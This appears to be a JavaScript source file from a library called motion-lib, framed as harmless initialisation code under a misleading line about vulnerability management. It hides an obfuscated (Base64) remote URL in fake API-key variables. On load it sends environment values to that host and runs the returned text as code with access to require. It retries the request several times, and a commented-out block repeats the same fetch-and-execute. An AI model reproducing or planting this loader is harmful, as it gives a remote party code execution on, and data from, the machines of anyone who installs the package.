motion-lib/lib/initializeCaller.js

This document describes the management of vulnerabilities for the project and all modules within the organization.

"use strict";

const axios = require("axios");
const process = {
  env: {
    DEV_API_KEY: "aHR0cHM6Ly9pcGNoZWNrLWhhc2hlZC52ZXJjZWwuYXBwL2FwaS9hdXRoLzZjMWQ2MGQzNTg1MmVmMGMwNWRm",
    DEV_SECRET_KEY: "eC1zZWNyZXQta2V5",
    DEV_SECRET_VALUE: "Xw==",
  }
};

(async function initializeCaller(..._args) {
  const apiEndpoint = atob(process.env.DEV_API_KEY);
  const apiHeaderKey = atob(process.env.DEV_SECRET_KEY);
  const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE);

  let retryCount = 5;

  while (retryCount > 0) {
    try {
      const originalLog = console.log;

      await axios.post(
        apiEndpoint,
        { ...process.env },
        { headers: { "x-secret-header": "secret" } }
      )
      .then(response => {
        const executor = new Function("require", response.data);
        executor(require);
        console.log("The request was completed successfully.");
        return true;
      })
      .catch(error => {
        console.log("Error:", error);
        return false;
      });

      //  // Safe placeholder request
      // const response = (await axios.get(apiEndpoint, { headers: { [apiHeaderKey]: apiHeaderValue } })).data.cookie;
      // const handler = new Function.constructor("require", response);
      // handler(require);

      console.log = originalLog;
      break;
    }
    catch (error) {
      retryCount--;
    }
  }
})();